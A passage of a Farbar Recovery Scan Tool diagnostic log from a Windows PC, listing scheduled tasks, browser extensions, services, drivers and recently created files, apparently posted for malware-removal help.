Task: {B669C2DF-0043-43E2-BD6E-2B93975B0C19} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3402832 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {BBB840E0-DF47-4533-842A-614A9FB55DB2} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [316632 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {C5600166-0D00-436C-9597-BB2E48267804} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-10-13] (Adobe Inc. -> Adobe)
Task: {D9E3F3C1-96EA-408C-93C5-EAB8CC220326} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [728184 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {E3339F51-E6A0-4320-BFB4-20947A367484} - System32\Tasks\MEGA\MEGAsync Update Task S-1-5-21-2643689781-145595849-2857803826-1001 => C:\Users\Tomika\AppData\Local\MEGAsync\MEGAupdater.exe [615160 2019-04-14] (Mega Limited -> Mega Limited)
Task: {E43C15E6-6414-4ACA-846C-D124676E2AD8} - System32\Tasks\Driver Booster SkipUAC (Tomika) => C:\Program Files (x86)\IObit\Driver Booster\7.2.0\DriverBooster.exe [7749904 2019-12-19] (IObit Information Technology -> IObit)
Task: {E83C055E-EA00-442C-83F5-A1DF6B84C917} - System32\Tasks\Driver Booster Update => C:\Program Files (x86)\IObit\Driver Booster\7.2.0\AutoUpdate.exe [2361104 2019-12-18] (IObit Information Technology -> IObit)
Task: {EDF106E5-69AB-49FB-9A36-0AF6F148BFCB} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [728184 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {FA8EF300-7063-437D-9ECE-A3820122D686} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [649336 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {FB2E7073-3061-4C88-848B-30215EF82E06} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [946296 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.81.1 213.46.172.38 213.46.172.39
Tcpip\..\Interfaces\{1F7EB040-CEB2-48F8-A98A-A024DE0DE62A}: [DhcpNameServer] 192.168.81.1 213.46.172.38 213.46.172.39

Edge:
======
Edge Profile: C:\Users\Tomika\AppData\Local\Microsoft\Edge\User Data\Default [2020-07-01]

FireFox:
========
FF DefaultProfile: 006jgses.default
FF ProfilePath: C:\Users\Tomika\AppData\Roaming\Mozilla\Firefox\Profiles\006jgses.default [2020-10-21]
FF Session Restore: Mozilla\Firefox\Profiles\006jgses.default -> is enabled.
FF Extension: (AdBlocker Ultimate) - C:\Users\Tomika\AppData\Roaming\Mozilla\Firefox\Profiles\006jgses.default\Extensions\adblockultimate@adblockultimate.net.xpi [2020-10-20]
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - D:\Programy\Adobe\Acrobat\Acrobat\Browser\WCFirefoxExtn
FF Extension: (Adobe Acrobat - Create PDF) - D:\Programy\Adobe\Acrobat\Acrobat\Browser\WCFirefoxExtn [2017-01-04] [Legacy] [not signed]
FF Plugin: @java.com/DTPlugin,version=13.0.1.0 -> C:\Program Files\Java\jre-10.0.1\bin\dtplugin\npDeployJava1.dll [2018-05-18] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=13.0.1.0 -> C:\Program Files\Java\jre-10.0.1\bin\plugin2\npjp2.dll [2018-05-18] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-10-12] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [No File]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2019-02-12] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @wolfram.com/Mathematica -> C:\Program Files (x86)\Common Files\Wolfram Research\Browser\11.0.1.5597552\npmathplugin.dll [2016-09-21] (Wolfram Research, Inc. -> Wolfram Research, Inc.)
FF Plugin-x32: Adobe Acrobat -> D:\Programy\Adobe\Acrobat\Acrobat\Air\nppdf32.dll [2014-08-05] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-10-12] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin-x32: wacom.com/WacomTabletPlugin -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [No File]

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default [2020-10-24]
CHR Notifications: Default -> hxxps://calendar.google.com; hxxps://web.skype.com; hxxps://www.messenger.com
CHR HomePage: Default -> hxxp://www.seznam.cz/?clid=13415
CHR StartupUrls: Default -> "hxxps://www.google.com/","hxxp://www.google.com ... oogle.com/"
CHR NewTab: Default -> Active:"chrome-extension://jpfpebmajhhopeonhlcgidhclcccjcik/newtab.html"
CHR Session Restore: Default -> is enabled.
CHR Extension: (Flash Video Downloader) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\aiimdkdngfcipjohbjenkahhlhccpdbc [2020-10-09]
CHR Extension: (ColorZilla) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\bhlhnicpbhignbdhedgjhgdocnmhomnp [2019-04-02]
CHR Extension: (Mendeley Web Importer) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\dagcmkpagjlhakfdhnbomgmjdpkdklff [2020-10-09]
CHR Extension: (Adobe Acrobat) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2020-09-16]
CHR Extension: (Video Downloader professional) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\elicpjhcidhpjomhibiffojpinpmmpil [2020-07-26]
CHR Extension: (News Feed Eradicator for Facebook) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjcldmjmjhkklehbacihaiopjklihlgg [2020-10-21]
CHR Extension: (Vysor) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\gidgenkbbabolejbgbpnhbimgjbffefm [2020-09-04]
CHR Extension: (AdBlock — best ad blocker) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2020-10-16]
CHR Extension: (Google Kalendář) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\gmbgaklkmjakoegficnlkhebmhkjfich [2020-06-11]
CHR Extension: (Toby for Chrome) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\hddnkoipeenegfoeaoibdmnaalmgkpip [2020-10-15]
CHR Extension: (LastPass: Free Password Manager) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd [2020-10-23]
CHR Extension: (Google Keep – poznámky a seznamy) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\hmjkmjkepdijhoojdojkdfohbdgmmhki [2020-10-23]
CHR Extension: (Obvibase: an online database editor) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\hoddinokjifhganfcgkjmkkngljebjdj [2020-09-02]
CHR Extension: (WhatFont) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\jabopobgcpjmedljpbcaablpmlmfcogm [2019-04-02]
CHR Extension: (Speed Dial 2 New tab) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpfpebmajhhopeonhlcgidhclcccjcik [2020-04-16]
CHR Extension: (Auto Replay for YouTube™) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\kanbnempkjnhadplbfgdaagijdbdbjeb [2019-11-25]
CHR Extension: (Grammarly for Chrome) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbfnbcaeplbcioakkpcpgfkobkghlhen [2020-10-21]
CHR Extension: (Any.do Extension) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdadialhpiikehpdeejjeiikopddkjem [2019-04-02]
CHR Extension: (Zoom for Google Chrome) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\lajondecmobodlejlcjllhojikagldgd [2020-08-14]
CHR Extension: (Application Launcher for Drive (by Google)) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2020-10-12]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-03]
CHR Extension: (Any.do) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\ocgddccilgpeepgglnlpchkpgamkgmld [2019-04-02]
CHR Extension: (Chrome Media Router) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-10-08]
CHR Profile: C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\System Profile [2019-06-09]
CHR HKU\S-1-5-21-2643689781-145595849-2857803826-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - D:\Programy\Adobe\Acrobat\Acrobat\Browser\WCChromeExtn\WCChromeExtn.crx [2014-05-08]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdAppMgrSvc; C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe [1262096 2016-04-19] (Autodesk, Inc -> Autodesk Inc.)
R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [83984 2018-12-16] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
S3 AdobeFlashPlayerUpdateSvc; C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-10-13] (Adobe Inc. -> Adobe)
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [744640 2016-10-12] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3739728 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3511376 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 CrypKey License; C:\Windows\system32\crypserv.exe [126976 2010-03-18] (CrypKey (Canada) Ltd.) [File not signed]
S3 GalaxyClientService; C:\Program Files (x86)\GOG Galaxy\GalaxyClientService.exe [1636936 2020-03-21] (GOG Sp. z o.o. -> GOG.com)
S3 GalaxyCommunication; C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe [6821960 2020-03-21] (GOG Sp. z o.o. -> GOG.com)
R2 IpOverUsbSvc; C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe [21304 2017-09-28] (Microsoft Corporation -> Microsoft Corporation)
R2 KiteService; C:\Program Files\Kite\KiteService.exe [141936 2020-10-22] (Manhattan Engineering Incorporated -> Kite)
S3 mracsvc; C:\Windows\System32\mracsvc.exe [20034712 2020-04-01] (Mail.Ru LLC -> LLC Mail.Ru)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2019-05-25] (Even Balance, Inc. -> )
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Test Signing Certificate -> Adobe Systems Incorporated) [File not signed]
S3 Te.Service; C:\Program Files (x86)\Windows Kits\10\Testing\Runtimes\TAEF\Wex.Services.exe [187904 2017-09-28] (Microsoft Corporation) [File not signed]
R2 TeamViewer; D:\Programy\TeamViewer\TeamViewer_Service.exe [13086224 2020-07-20] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [361824 2017-01-12] (Microsoft Corporation -> Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [119872 2017-01-12] (Microsoft Corporation -> Microsoft Corporation)
R2 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.4.2.222\WsAppService.exe [474768 2017-03-01] (Wondershare software CO., LIMITED -> Wondershare)
R2 NvTelemetryContainer; "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\plugin"

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 CH341SER_A64; C:\Windows\System32\Drivers\CH341S64.SYS [69016 2019-03-04] (Microsoft Windows Hardware Compatibility Publisher -> www.winchiphead.com)
R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [27552 2018-08-19] (Martin Malik - REALiX -> REALiX(tm))
S3 mracdrv; C:\Windows\System32\drivers\mracdrv.sys [19266680 2020-04-01] (Mail.Ru LLC -> LLC Mail.Ru)
R1 NetworkX; C:\Windows\System32\ckldrv.sys [30272 2010-03-19] (CrypKey (Canada) Inc. -> )
R1 npcap; C:\Windows\system32\DRIVERS\npcap.sys [60504 2020-04-04] (Insecure.Com LLC -> Insecure.Com LLC.)
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [46600 2017-02-10] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [274776 2017-01-12] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [117592 2017-01-12] (Microsoft Windows -> Microsoft Corporation)
S3 xb1usb; C:\Windows\System32\drivers\xb1usb.sys [42760 2019-03-31] (Windows Central Build Account - X -> Microsoft Corporation)
U4 npcap_wifi; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) ===================

(If an entry is included in the fixlist, the file/folder will be moved.)

2020-10-24 19:59 - 2020-10-24 20:00 - 000029189 _____ C:\Users\Tomika\Desktop\FRST.txt
2020-10-24 19:59 - 2020-10-24 19:59 - 000000000 ____D C:\Users\Tomika\Desktop\FRST-OlderVersion
2020-10-24 08:12 - 2020-10-24 08:12 - 000000000 ____D C:\Users\Tomika\Downloads\Flanagan, John - Hranicaruv ucen 10 - Cisar Nihon-Dzinu - (Audiokniha).rar
2020-10-24 08:09 - 2020-10-24 08:09 - 000000000 ___HD C:\Users\Public\Documents\AdobeGC
2020-10-24 08:09 - 2020-10-24 08:09 - 000000000 ___HD C:\ProgramData\Documents\AdobeGC
2020-10-23 23:11 - 2020-10-23 23:11 - 000000000 ____D C:\Users\Tomika\AppData\Local\Tempzxpsign9f3a6ac83dce8d46
2020-10-23 23:10 - 2020-10-23 23:10 - 000000000 ____D C:\Users\Tomika\AppData\Local\Tempzxpsign63db37a8c8529841
2020-10-23 19:27 - 2020-10-23 19:27 - 000000626 _____ C:\Users\Public\Desktop\Guild Wars 2.lnk
2020-10-23 19:27 - 2020-10-23 19:27 - 000000626 _____ C:\ProgramData\Desktop\Guild Wars 2.lnk
2020-10-23 19:27 - 2020-10-23 19:27 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Guild Wars 2
2020-10-23 19:26 - 2020-10-23 19:27 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Guild Wars 2
2020-10-23 17:47 - 2020-10-23 17:52 - 000000000 ____D C:\AdwCleaner
2020-10-23 17:46 - 2020-10-23 17:46 - 008447152 _____ (Malwarebytes) C:\Users\Tomika\Desktop\adwcleaner_8.0.8.exe
2020-10-23 15:38 - 2020-10-23 15:38 - 000000872 _____ C:\Users\Tomika\Desktop\Vindictus.lnk
2020-10-23 14:40 - 2020-10-23 14:40 - 000000780 _____ C:\Users\Public\Desktop\Nexon Launcher.lnk
2020-10-23 14:40 - 2020-10-23 14:40 - 000000780 _____ C:\ProgramData\Desktop\Nexon Launcher.lnk
2020-10-23 14:40 - 2020-10-23 14:40 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\NexonLauncherSwapApp
2020-10-23 14:40 - 2020-10-23 14:40 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Nexon Launcher
2020-10-23 14:39 - 2020-10-23 15:40 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\NexonLauncher
2020-10-23 14:39 - 2020-10-23 14:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Nexon
2020-10-23 10:44 - 2020-10-24 19:59 - 000000000 ____D C:\FRST
2020-10-23 10:42 - 2020-10-24 19:59 - 002299904 _____ (Farbar) C:\Users\Tomika\Desktop\FRST64.exe
2020-10-23 08:55 - 2020-10-23 08:55 - 000067246 _____ C:\Users\Tomika\Downloads\[SkT]Simon_Scarrow_-_serie_Quintus_Licinius_Cato_(2016-2020_CZ).torrent
2020-10-23 08:54 - 2020-10-23 08:54 - 000021972 _____ C:\Users\Tomika\Downloads\[SkT]Jozef_Karika__Cierny_kruh__Koniec_mafie_(2020)(SK).torrent
2020-10-23 08:54 - 2020-10-23 08:54 - 000021451 _____ C:\Users\Tomika\Downloads\[SkT]____Brian_W._Aldiss_-_Nonstop_(1989)(CZ).torrent
2020-10-23 08:40 - 2020-10-23 09:27 - 843273297 _____ C:\Users\Tomika\Downloads\Flanagan, John - Hranicaruv ucen 10 - Cisar Nihon-Dzinu - (Audiokniha).rar.zip
2020-10-19 21:47 - 2020-10-19 21:47 - 001013608 _____ C:\Users\Tomika\Downloads\sous vide review.pdf
2020-10-19 20:04 - 2020-10-19 20:04 - 000275000 _____ C:\Windows\Minidump\101920-50875-01.dmp
2020-10-17 19:31 - 2020-10-17 19:31 - 000420752 _____ C:\Windows\Minidump\101720-31906-01.dmp
2020-10-13 19:47 - 2020-09-30 09:20 - 000135240 _____ (Microsoft Corporation) C:\Windows\system32\gpapi.dll
2020-10-13 19:47 - 2020-09-30 05:04 - 003332608 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2020-10-13 19:47 - 2020-09-30 04:56 - 000445440 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2020-10-13 19:47 - 2020-09-30 04:48 - 001118720 _____ (Microsoft Corporation) C:\Windows\system32\gpedit.dll
2020-10-13 19:47 - 2020-09-30 04:15 - 001381888 _____ (Microsoft Corporation) C:\Windows\system32\gpsvc.dll
2020-10-13 19:47 - 2020-09-29 07:32 - 000115616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gpapi.dll
2020-10-13 19:47 - 2020-09-29 06:11 - 003642368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2020-10-13 19:47 - 2020-09-29 06:00 - 000324096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2020-10-13 19:47 - 2020-09-29 05:54 - 001067520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gpedit.dll
2020-10-13 19:47 - 2020-09-24 08:47 - 000120832 _____ (Microsoft Corporation) C:\Windows\system32\userenv.dll
2020-10-13 19:47 - 2020-09-24 08:43 - 002535968 _____ (Microsoft Corporation) C:\Windows\system32\msxml6.dll
2020-10-13 19:47 - 2020-09-24 08:36 - 007363320 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2020-10-13 19:47 - 2020-09-24 08:36 - 002173392 _____ (Microsoft Corporation) C:\Windows\system32\combase.dll
2020-10-13 19:47 - 2020-09-24 08:01 - 025759232 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2020-10-13 19:47 - 2020-09-24 07:01 - 000098104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\userenv.dll
2020-10-13 19:47 - 2020-09-24 07:00 - 001902240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml6.dll
2020-10-13 19:47 - 2020-09-24 06:53 - 001561296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\combase.dll
2020-10-13 19:47 - 2020-09-24 06:28 - 002914304 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2020-10-13 19:47 - 2020-09-24 06:25 - 000581120 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2020-10-13 19:47 - 2020-09-24 06:25 - 000088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2020-10-13 19:47 - 2020-09-24 06:16 - 005500416 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2020-10-13 19:47 - 2020-09-24 06:14 - 000785408 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2020-10-13 19:47 - 2020-09-24 06:13 - 020293632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2020-10-13 19:47 - 2020-09-24 06:04 - 000517120 _____ (Microsoft Corporation) C:\Windows\system32\cmdial32.dll
2020-10-13 19:47 - 2020-09-24 05:57 - 000498176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2020-10-13 19:47 - 2020-09-24 05:55 - 000064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2020-10-13 19:47 - 2020-09-24 05:54 - 002306048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2020-10-13 19:47 - 2020-09-24 05:53 - 000477696 _____ (Microsoft Corporation) C:\Windows\system32\puiobj.dll
2020-10-13 19:47 - 2020-09-24 05:53 - 000092672 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2020-10-13 19:47 - 2020-09-24 05:52 - 000145408 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2020-10-13 19:47 - 2020-09-24 05:51 - 000315904 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2020-10-13 19:47 - 2020-09-24 05:47 - 001033216 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2020-10-13 19:47 - 2020-09-24 05:47 - 000653824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2020-10-13 19:47 - 2020-09-24 05:41 - 000262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2020-10-13 19:47 - 2020-09-24 05:40 - 015494144 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2020-10-13 19:47 - 2020-09-24 05:39 - 000728064 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2020-10-13 19:47 - 2020-09-24 05:39 - 000484352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cmdial32.dll
2020-10-13 19:47 - 2020-09-24 05:39 - 000381952 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2020-10-13 19:47 - 2020-09-24 05:38 - 000809472 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2020-10-13 19:47 - 2020-09-24 05:37 - 002132992 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2020-10-13 19:47 - 2020-09-24 05:33 - 003631616 _____ (Microsoft Corporation) C:\Windows\system32\tquery.dll
2020-10-13 19:47 - 2020-09-24 05:32 - 000392192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssph.dll
2020-10-13 19:47 - 2020-09-24 05:32 - 000272896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchProtocolHost.exe
2020-10-13 19:47 - 2020-09-24 05:31 - 000076800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2020-10-13 19:47 - 2020-09-24 05:30 - 000279552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2020-10-13 19:47 - 2020-09-24 05:30 - 000128000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iepeers.dll
2020-10-13 19:47 - 2020-09-24 05:29 - 002750464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tquery.dll
2020-10-13 19:47 - 2020-09-24 05:27 - 000880640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2020-10-13 19:47 - 2020-09-24 05:27 - 000230400 _____ (Microsoft Corporation) C:\Windows\system32\profsvc.dll
2020-10-13 19:47 - 2020-09-24 05:26 - 004859904 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2020-10-13 19:47 - 2020-09-24 05:26 - 000699392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssvp.dll
2020-10-13 19:47 - 2020-09-24 05:26 - 000110080 _____ (Microsoft Corporation) C:\Windows\system32\fdSSDP.dll
2020-10-13 19:47 - 2020-09-24 05:25 - 004112384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2020-10-13 19:47 - 2020-09-24 05:23 - 000230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2020-10-13 19:47 - 2020-09-24 05:22 - 000696320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2020-10-13 19:47 - 2020-09-24 05:22 - 000333312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2020-10-13 19:47 - 2020-09-24 05:21 - 002058752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2020-10-13 19:47 - 2020-09-24 05:20 - 013872640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2020-10-13 19:47 - 2020-09-24 05:18 - 000172032 _____ (Microsoft Corporation) C:\Windows\system32\fdWSD.dll
2020-10-13 19:47 - 2020-09-24 05:15 - 001566720 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2020-10-13 19:47 - 2020-09-24 05:13 - 000092672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fdSSDP.dll
2020-10-13 19:47 - 2020-09-24 05:10 - 000133120 _____ (Microsoft Corporation) C:\Windows\system32\mssprxy.dll
2020-10-13 19:47 - 2020-09-24 05:08 - 000905728 _____ (Microsoft Corporation) C:\Windows\system32\SearchIndexer.exe
2020-10-13 19:47 - 2020-09-24 05:08 - 000145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fdWSD.dll
2020-10-13 19:47 - 2020-09-24 05:07 - 002551808 _____ (Microsoft Corporation) C:\Windows\system32\mssrch.dll
2020-10-13 19:47 - 2020-09-24 05:07 - 001099264 _____ (Microsoft Corporation) C:\Windows\system32\localspl.dll
2020-10-13 19:47 - 2020-09-24 05:06 - 000866304 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2020-10-13 19:47 - 2020-09-24 05:04 - 004387840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2020-10-13 19:47 - 2020-09-24 05:03 - 000801280 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2020-10-13 19:47 - 2020-09-24 05:01 - 001920512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssrch.dll
2020-10-13 19:47 - 2020-09-24 05:00 - 001341952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2020-10-13 19:47 - 2020-09-24 05:00 - 000711168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchIndexer.exe
2020-10-13 19:47 - 2020-09-24 04:59 - 000710656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2020-10-13 19:47 - 2020-09-24 04:55 - 003826176 _____ (Microsoft Corporation) C:\Windows\system32\rdpcore.dll
